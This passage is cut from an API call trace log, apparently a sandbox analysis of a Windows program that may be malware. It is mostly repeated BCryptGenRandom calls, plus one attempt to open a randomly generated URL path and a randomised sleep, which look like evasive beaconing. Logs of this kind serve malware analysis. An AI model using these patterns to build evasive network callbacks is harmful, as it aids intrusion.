dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0268.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.452] GetProcessHeap () returned 0x440000 [0268.452] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0268.452] lstrcpyA (in: lpString1=0x472b10, lpString2=" ^M" | out: lpString1=" ^M") returned=" ^M" [0268.452] lstrcatA (in: lpString1=" ^M", lpString2="/bw6nLzj3Xhdmjkq7k6tc83q673Uhevm/rxgylar50o1fasVxmmc4Jx6kiaBh3PpsHmx3uPf3v4/klfykfuFnyeiiUHoSQetuVseiu/6f11vbgTzivfXdZpempuhkdxspt8fzb1dsbz/" | out: lpString1=" ^M/bw6nLzj3Xhdmjkq7k6tc83q673Uhevm/rxgylar50o1fasVxmmc4Jx6kiaBh3PpsHmx3uPf3v4/klfykfuFnyeiiUHoSQetuVseiu/6f11vbgTzivfXdZpempuhkdxspt8fzb1dsbz/") returned=" ^M/bw6nLzj3Xhdmjkq7k6tc83q673Uhevm/rxgylar50o1fasVxmmc4Jx6kiaBh3PpsHmx3uPf3v4/klfykfuFnyeiiUHoSQetuVseiu/6f11vbgTzivfXdZpempuhkdxspt8fzb1dsbz/" [0268.452] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0268.452] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl=" ^M/bw6nLzj3Xhdmjkq7k6tc83q673Uhevm/rxgylar50o1fasVxmmc4Jx6kiaBh3PpsHmx3uPf3v4/klfykfuFnyeiiUHoSQetuVseiu/6f11vbgTzivfXdZpempuhkdxspt8fzb1dsbz/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0268.453] GetProcessHeap () returned 0x440000 [0268.453] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0268.453] GetProcessHeap () returned 0x440000 [0268.453] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0268.453] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0268.453] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0268.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0268.453] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0268.453] Sleep (dwMilliseconds=0x1a1cb) [0268.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0268.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.660] GetProcessHeap () returned 0x440000 [0268.660] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17660 [0268.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17661, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a17661) returned 0x0 [0268.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17677, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a17677) returned 0x0 [0268.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.676] 